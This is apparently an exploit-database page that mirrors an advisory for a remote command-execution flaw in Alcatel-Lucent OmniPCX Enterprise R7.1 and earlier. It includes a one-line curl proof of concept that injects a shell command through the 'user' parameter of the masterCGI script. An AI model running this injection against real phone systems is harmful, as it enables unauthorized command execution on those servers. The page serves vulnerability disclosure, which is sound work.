Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Alcatel-Lucent OmniPCX Enterprise Remote Command Execution Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
OmniPCX Enterprise
by:
7.5
CVSS
HIGH
Remote Command Execution
CWE
Product Name: OmniPCX Enterprise
Affected Version From: R7.1 and prior versions
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Alcatel-Lucent OmniPCX Enterprise Remote Command Execution Vulnerability

Alcatel-Lucent OmniPCX Enterprise is prone to a remote command-execution vulnerability because it fails to adequately sanitize user-supplied data. Attackers can exploit this issue to execute arbitrary commands with the privileges of the 'httpd' user. Successful attacks may facilitate a compromise of the application and underlying webserver; other attacks are also possible.

Mitigation:

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25694/info

Alcatel-Lucent OmniPCX Enterprise is prone to a remote command-execution vulnerability because it fails to adequately sanitize user-supplied data.

Attackers can exploit this issue to execute arbitrary commands with the privileges of the 'httpd' user. Successful attacks may facilitate a compromise of the application and underlying webserver; other attacks are also possible.

Alcatel-Lucent OmniPCX Enterprise R7.1 and prior versions are vulnerable to this issue. 

curl -k "https://www.example.com/cgi-bin/masterCGI?ping=nomip&user=;ls\${IFS}-l;"

Navigation

Suggest Exploit

Services By CQR